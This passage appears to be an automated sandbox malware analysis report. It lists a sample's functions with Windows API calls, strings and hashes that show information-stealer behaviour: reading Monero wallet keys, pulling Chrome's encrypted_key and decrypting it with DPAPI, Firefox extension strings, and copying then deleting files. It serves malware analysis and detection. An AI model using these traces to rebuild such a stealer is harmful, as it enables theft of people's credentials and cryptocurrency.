                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 7aab9581dd6db5082971659e87fc337c33a0be63412c2e5087966b85f2a2514a
                        • Instruction ID: 22fc5ffa4fe2f1ee5a208006ec1c1c8f0c3ac39ce1cd37b7d5782e6c1b7078c7
                        • Opcode Fuzzy Hash: 7aab9581dd6db5082971659e87fc337c33a0be63412c2e5087966b85f2a2514a
                        • Instruction Fuzzy Hash: FEE08670B40208FFC710EB94DD09E5977B8EB44702F000054FD4AA7240D9766E008B51
                        Function 00E2A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E2A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 00E2A3FF
                        • lstrlen.KERNEL32(00000000), ref: 00E2A6BC
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 00E2A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 6a5ba5e3ca57f58b2ea4c98e6007daedcfaa13a15b63b92147d2441c18114c83
                        • Instruction ID: 931cd8f62959df4fffb8ace2d6f5be63da8329ac6786a142890602584040da7f
                        • Opcode Fuzzy Hash: 6a5ba5e3ca57f58b2ea4c98e6007daedcfaa13a15b63b92147d2441c18114c83
                        • Instruction Fuzzy Hash: C3E12272810108ABCB18FBA4DC9AEEE777CAF54300F549179F55772091EF346A89CB62
                        Function 00E2D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E2D481
                        • lstrlen.KERNEL32(00000000), ref: 00E2D698
                        • lstrlen.KERNEL32(00000000), ref: 00E2D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 00E2D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 23ee6be945330f8d226be686e0308d25429ecdf7e7d8119ee8b462bc95e26c0c
                        • Instruction ID: 214b93f7f7d7477c056d4440bb7eac6160e68d88475699cf496451b1d9b2d5e1
                        • Opcode Fuzzy Hash: 23ee6be945330f8d226be686e0308d25429ecdf7e7d8119ee8b462bc95e26c0c
                        • Instruction Fuzzy Hash: 55913672910108ABCB18FBA0DC99EEE7778AF54300F545179F54773091EF346A89CB62
                        Function 00E2D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E38B60: GetSystemTime.KERNEL32(00E40E1A,0196E990,00E405AE,?,?,00E213F9,?,0000001A,00E40E1A,00000000,?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E38B86
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E2D801
                        • lstrlen.KERNEL32(00000000), ref: 00E2D99F
                        • lstrlen.KERNEL32(00000000), ref: 00E2D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 00E2DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: c0dd56067da76969de5ddc2f9aa12418a27521a67fdb1d9fd0d710f6abcdc138
                        • Instruction ID: 21b1cce191df8a828fae70a839e09decbc48d928134c10626b4f3c35ef9718da
                        • Opcode Fuzzy Hash: c0dd56067da76969de5ddc2f9aa12418a27521a67fdb1d9fd0d710f6abcdc138
                        • Instruction Fuzzy Hash: 048125729101189BCB08FBA4DC99EEE77B8AF54300F445179F587B7091EF346A49CB62
                        Function 00E2F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00E41580,00E40D92), ref: 00E2F54C
                        • lstrlen.KERNEL32(00000000), ref: 00E2F56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: 50e26f5d15dad949628429a368aeb7292e06addad750f276224556d8828091d3
                        • Instruction ID: 4405162b7223549f7c258de9f7e8a0754ec763db60d692ff66534b0239c14d6c
                        • Opcode Fuzzy Hash: 50e26f5d15dad949628429a368aeb7292e06addad750f276224556d8828091d3
                        • Instruction Fuzzy Hash: 7E514372D00108AADB08FFA0EC9ADED77B8AF54300F449578F44677191EE346A49CBA2
                        Function 00E370D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 3722407311-3520659465
                        • Opcode ID: d67639f81f5f0a0a7e199e95c6ec9426a45b545b743bc3920d6b2c09a776c976
                        • Instruction ID: 75f84b129f3e798de57c58e166e43b044eae85e1434bc03702e945912536f7f4
                        • Opcode Fuzzy Hash: d67639f81f5f0a0a7e199e95c6ec9426a45b545b743bc3920d6b2c09a776c976
                        • Instruction Fuzzy Hash: 665190F1D042189BDB24EBA0DC99FEEBBB4AF44304F1460A8E25577181EB746E88CF55
                        Function 00E33560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: c6e36111cfd96b0c745ce91832a807d8e468bde0d1b28df11659336c10f9a04b
                        • Instruction ID: 3d534878a0b7561c92ae346538a7b4e195cf25598e7aaa771dc22bd050e205d3
                        • Opcode Fuzzy Hash: c6e36111cfd96b0c745ce91832a807d8e468bde0d1b28df11659336c10f9a04b
                        • Instruction Fuzzy Hash: CB4121B1D10209AFCB04EFA4D84AEFEBBB4AB44304F049429F51577251DB756649CF91
                        Function 00E29CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E299EC
                          • Part of subcall function 00E299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E29A11
                          • Part of subcall function 00E299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E29A31
                          • Part of subcall function 00E299C0: ReadFile.KERNEL32(000000FF,?,00000000,00E2148F,00000000), ref: 00E29A5A
                          • Part of subcall function 00E299C0: LocalFree.KERNEL32(00E2148F), ref: 00E29A90
                          • Part of subcall function 00E299C0: CloseHandle.KERNEL32(000000FF), ref: 00E29A9A
                          • Part of subcall function 00E38E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E38E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E29D39
                          • Part of subcall function 00E29AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29AEF
                          • Part of subcall function 00E29AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E24EEE,00000000,?), ref: 00E29B01
                          • Part of subcall function 00E29AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E29B2A
                          • Part of subcall function 00E29AC0: LocalFree.KERNEL32(?,?,?,?,00E24EEE,00000000,?), ref: 00E29B3F
                          • Part of subcall function 00E29B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E29B84
                          • Part of subcall function 00E29B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00E29BA3
                          • Part of subcall function 00E29B60: LocalFree.KERNEL32(?), ref: 00E29BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: cbe05b69ed2314909c31163efc05251246aa34588b507d488280c973a2036acd
                        • Instruction ID: c10ab4bc1a6b7f7fca9650ec73698fe57eea31e1063c90d13305337bb4ba4e41
                        • Opcode Fuzzy Hash: cbe05b69ed2314909c31163efc05251246aa34588b507d488280c973a2036acd
                        • Instruction Fuzzy Hash: 623150B6D10219ABCF04DBE4EC85BEEB7B8AF48304F146558E901B3242E7349A44CBA1
                        Function 00E3C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 00E3C74E
                          • Part of subcall function 00E3BF9F: __amsg_exit.LIBCMT ref: 00E3BFAF
                        • __getptd.LIBCMT ref: 00E3C765
                        • __amsg_exit.LIBCMT ref: 00E3C773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00E3C797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: cb8d48947eb0d1396eee96dcb4bb2191569d44c20a3d826b3279ec21f2cf8d9f
                        • Instruction ID: eed98e1abddf9c717280960764885080a57142a4752e9f78e46e150754e854df
                        • Opcode Fuzzy Hash: cb8d48947eb0d1396eee96dcb4bb2191569d44c20a3d826b3279ec21f2cf8d9f
                        • Instruction Fuzzy Hash: 5FF09A32A043009BD721BBB89C0FB5A3FE06F00724F38714AFA55B62D2DB649981DF56
